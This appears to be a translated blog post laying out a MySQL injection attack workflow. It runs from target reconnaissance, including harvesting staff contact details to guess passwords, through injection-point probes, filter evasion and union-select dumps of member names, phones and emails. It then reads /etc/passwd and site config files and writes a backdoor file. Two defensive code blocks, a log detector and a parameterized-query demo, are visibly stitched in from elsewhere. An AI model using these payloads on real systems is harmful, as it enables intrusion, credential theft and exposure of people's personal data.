A Brief Talk on Mysql Injection Experience


### 1. Injection preparation and attack steps

1. Confirm the target website for the injection test.

2. Collect, analyze and extract general information about the target website.

3. Technical analysis of the website: find and test usable injection points, and analyze the input and output mechanism of the web pages.

4. Reconnaissance: inject SQL to determine the database type and the permission level of the current account.

5. Privilege escalation analysis: based on the account level, determine whether privileges can be escalated by interacting with the system layer, whether they can be escalated within the database layer, and whether the web back-end administrator's credentials can be obtained.

6. Determine which kind of SQL injection the website allows: blind injection, or echo injection (query results displayed on the page)?

7. Blind injection strategy: use automated injection tools in place of manual work.

   Echo injection strategy: the third party takes the displayed position.

Collection, analysis and extraction of general information:

Belief: no information is useless.

Anything made by people can contain flaws, and every piece of information reveals another layer of information behind it.

1. Domain name information.

2. Extended domain name information, such as the registrant, company, contact phone number and similar details.

3. Information on all staff connected with the website, such as the contact details of the technical R&D personnel (QQ, mobile numbers, blogs, Weibo and so on). The goal is to learn the password-setting habits and patterns of the people involved.

Technical analysis:

1. Technical analysis

Correlate the collected general information, analyze the web page source code and the input/output mechanism, and find and test usable injection points.

2. Use the Firefox browser with the HackBar browser plug-in installed.


### 2. Discovery and testing of injection points

1. Common injection points

a. Input fields in forms

b. URL parameters (the most common)

c. Cookies or hidden fields

2. Form input fields, cookies or hidden fields

The web page's input and output mechanisms must be fully analyzed, filtered and extracted in order to understand the possible paths by which SQL injection could be executed: the input field, cookie or URL parameter variable name, and how it is passed on to the database engine.

3. URL parameters

- First use invariant logic and empty-set logic to determine which parameter is the injection point.

String-type parameters: use a single quote ' or a double quote " to test whether the quoted string can be closed.

' and '1'='1   invariant logic: the page or program should display normally

' and '1'='2   empty-set logic: the page or program displays incorrectly or reports an error

' or '1'='1   full-set logic: test whether the amount of data processed by the page changes

Integer-type parameters:

and 1=1   invariant logic: the page or program displays normally

and 1=2   empty-set logic: the page or program displays incorrectly or reports an error

or 1=1   full-set logic: test whether the amount of data processed by the page changes

- Obtain useful information from the injection point

and left(version(),1)=5

and substr(version(),1,1)=5   // determine whether the first digit of the database version number is 5

If the page returns normally, this indicates:

1. The database is MySQL.

2. Database functions execute without being filtered.

3. Parentheses are not filtered.

4. Subqueries may not be filtered.

5. Complex logic can be injected.

6. Assess the degree of injection.

- Confirm the user privilege level

user()

Web page injection test: and (select length(user()) from mysql.user where user like 'z%')>1

and (select count(*) from mysql.user where user=user())>=1

and (select length(user()) from mysql.user where user=user())>=1

If the page returns normally, this indicates:

1. The account has access to the mysql system database; otherwise it does not.

   Without that access, retrieving passwords is restricted and other routes must be found, such as the password of the web site's administrator.

2. If there is no access to the mysql system database, test access to the information_schema dictionary database.

Injection test: and (select count(*) from information_schema.tables where table_schema=database())>1

If the page returns normally, this indicates:

The account has access to the information_schema dictionary database and can obtain all databases, all tables and all dictionary information, which helps in breaking the administrator's access to the web back end.


### 3. Confirm the type of SQL injection when choosing the attack strategy

Classified by output mechanism:

Blind injection: the content of the database is not displayed on the web page; only a logical (true/false) judgment is possible.

Error-based injection: make full use of the program's and the database's error messages, which naively reveal all the information.

Echo injection: the content of the injected query is displayed on the web page.

Other: out-of-band channels such as email, FTP, Samba and other protocols.

Echo injection: the third party takes the displayed position

and 1=2 union select 1,2,3,4,5,6,7,8,9 --+   // --+ comments out the rest of the SQL statement; the + is used to avoid possible checks for spaces

// Observe which of the numbers appear on the page: those positions can be replaced with crafted expressions to expose database information.

Subquery test:

Alternative query that only reads the database dictionary information:

union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables where table_schema=database() limit 1 --   // query table names

// When the echo positions are limited, the concat(), concat_ws() and group_concat() functions can be used to echo more information through one position.


### 4. Evading filters

Bypassing space checks:

1. or--+1=!!1   use the invariant logic !! or !!! in place of spaces

2. Comments in place of spaces: and/**/select/**/uname/**/from/**/users

3. Replace spaces with the + connector

4. Use the URL-encoded form %20

5. Use the ASCII code: char(32)

Bypassing single-quote checks:

1. Express the condition another way:

and left(user(),1)='z'   becomes   and ascii(left(user(),1))=122
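Added example, not from the original post: defender-side detection of the boolean probes from section 2 and the space-check evasions from section 4, run over constructed access-log lines. The log format, signature names and sample requests are assumptions; the normalisation step undoes the +/%20 decoding, /**/ comments and char(32) described above before matching.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post) carrying the text's probes and evasions.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=10008 HTTP/1.1" 200
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=10008+and+1=2 HTTP/1.1" 200
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1%20and%201=2%20union%20select%201,2,3--+ HTTP/1.1" 200
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1/**/and/**/left(version(),1)=5 HTTP/1.1" 200
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=1%20and%200=9%20union%20select%201,load_file(char(47,101,116,99))--+ HTTP/1.1" 200
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=union+station+cafe HTTP/1.1" 200
"""

# One match per log line: client address and the request target (path?query).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+)', re.M)
# Signatures for the techniques described in the text, matched on the normalised query.
SIGNATURES = {
    "boolean-probe":    re.compile(r"\b(?:and|or)\s+'?\d+'?\s*=\s*'?\d+"),
    "union-select":     re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "fingerprint-func": re.compile(r"\b(?:version|user|database)\s*\(\s*\)"),
    "schema-enum":      re.compile(r"\b(?:information_schema|mysql)\.\w+"),
    "file-access":      re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b"),
    "comment-tail":     re.compile(r"--\s*$"),
}

def normalise(raw_query: str) -> str:
    """Undo the space evasions: decode +/%20, drop /**/ comments, expand char(32)."""
    text = unquote_plus(raw_query)
    text = re.sub(r"/\*.*?\*/", " ", text)
    text = text.replace("char(32)", " ")
    return re.sub(r"\s+", " ", text).strip().lower()

def analyze_request(raw_query: str) -> list[str]:
    """Return the signature names that fire for one raw query string."""
    norm = normalise(raw_query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
    if hits and "/*" in unquote_plus(raw_query):
        hits.append("evasion:inline-comment")
    if hits and re.search(r"\bchar\s*\(", norm):
        hits.append("evasion:char-encoding")
    return hits

def scan_log(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client, path, findings) for every request that trips a signature."""
    findings = []
    for m in REQUEST_RE.finditer(log_text):
        client, target = m.groups()
        path, _, query = target.partition("?")
        if hits := analyze_request(query):
            findings.append((client, path, hits))
    return findings
```

Running scan_log(SAMPLE_LOG) flags the four probing requests from 10.0.0.7 and leaves the plain lookup and the "union station" search alone, since the signatures require the full keyword pair rather than a single word.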


### 5. Dumping the database and obtaining back-end administrator privileges

Dump database names

and 1=2 union select 1,2,3,4,concat_ws('~',schema_name),6,7,8,9 from information_schema.schemata limit 1,10 --

Dump table names   // tables holding the web back-end administrator password may be named like %user%, %member%

and 1=2 union select 1,2,3,4,concat_ws('~',table_schema,table_name,table_rows,table_comment),6,7,8,9 from information_schema.tables where table_schema=database() --

Dump column names   // column_name and column_comment may describe the function of the field

and 1=2 union select 1,2,3,4,concat_ws('~',table_schema,table_name,column_name,column_comment),6,7,8,9 from information_schema.columns where table_schema=database() and table_name='member' limit 1,10 --

Dump field values

and 1=2 union select 1,2,3,4,concat_ws('~',member_name,mobile,e_mail),6,7,8,9 from zakkanet.member limit 1,100 --

// add where ... like '%admin%' to find the administrator's sensitive information

Ruling out other causes:

If the result is empty, was the statement entered incorrectly, or is the echoed value itself empty?

ifnull(table_name,'null_tablename')   // if the field is empty, null_tablename is echoed instead

### 6. Privilege escalation through system interaction

1. Ways to interact with the system layer

  • Read and write disk files

  • Execute commands directly

    Whether privileges can be escalated through the system layer depends on the privileges the mysql server process runs with and on the privilege level of the database account the application connects with.

2. Read system files

load_file('/etc/passwd')

select uid,uname from users where uid=10008 and 0=9 union select 1,load_file('/etc/passwd')

select uid,uname from users where uid=10008 and 0=9 union select 1,load_file('/var/www/html/web.config')   // read the website configuration file

dbconfig.conf   // read the website configuration to obtain the database user name and password

Use substr(), char(), ascii() and similar functions for blind extraction.

3. Leave a backdoor script file

select '<script>alert()</script>' into outfile '/var/www/html/test.php';   // obfuscated test script
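Added example, not from the original post: the users query from section 6 as the application would build it by string concatenation, beside a parameterized form and an integer-validated form, run against an in-memory SQLite stand-in. The tables, rows and payload are constructed; SQLite is used so it runs offline, so the union target is the member table from section 5 rather than load_file(), which SQLite does not have.

```python
import sqlite3

# Offline SQLite stand-in (constructed data) for the MySQL tables named in the
# text: users queried by uid, and the member table from the dump examples.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(uid INTEGER, uname TEXT);
        INSERT INTO users VALUES (10008, 'alice'), (10009, 'bob');
        CREATE TABLE member(member_name TEXT, mobile TEXT, e_mail TEXT);
        INSERT INTO member VALUES ('admin', '555-0100', 'admin@example.test');
    """)
    return db

def lookup_vulnerable(db: sqlite3.Connection, uid_param: str) -> list:
    # The query from the text built by string concatenation: the parameter is
    # spliced into the SQL text, so a trailing 'and 0=9 union select ...' runs as SQL.
    sql = "select uid,uname from users where uid=" + uid_param
    return db.execute(sql).fetchall()

def lookup_parameterized(db: sqlite3.Connection, uid_param: str) -> list:
    # Placeholder binding: the driver passes the value separately from the
    # statement, so the whole string is compared as one value and never parsed.
    sql = "select uid,uname from users where uid=?"
    return db.execute(sql, (uid_param,)).fetchall()

def lookup_hardened(db: sqlite3.Connection, uid_param: str) -> list:
    # For an integer parameter (the text's second probe class), validate the type
    # as well; '10008 and 1=2' is then rejected before any SQL is built.
    uid = int(uid_param)  # raises ValueError for anything but digits
    return db.execute("select uid,uname from users where uid=?", (uid,)).fetchall()

# Constructed payload in the shape of the section-6 query (union target swapped
# for the member table because SQLite has no load_file()).
PAYLOAD = "10008 and 0=9 union select member_name,mobile from member"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:  ", lookup_vulnerable(db, PAYLOAD))     # injected row leaks
    print("parameterized: ", lookup_parameterized(db, PAYLOAD))  # no rows
    print("hardened, valid id:", lookup_hardened(db, "10008"))
```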


### 7. SQL injection vulnerability detection tools

1. Replace manual work by automatically detecting vulnerable URLs

Safe3 SQL Injector

It is described as the most powerful and easy-to-use penetration testing tool, able to automatically detect and exploit SQL injection vulnerabilities and database server processes.

Safe3 SQL Injector can read MySQL, Oracle, PostgreSQL, SQL Server, Access, SQLite, Firebird, Sybase, SAP, MaxDB and other databases. It also supports writing files on MySQL and SQL Server and executing arbitrary commands on SQL Server and Oracle. Safe3 SQL Injector supports error-based, union-based and time-based blind injection attacks.

2. Exhaustively test the possible injections of a specified URL

Needless to say, sqlmap is the go-to injection tool.

Source: blog.csdn.net/qq_43665434/article/details/114629706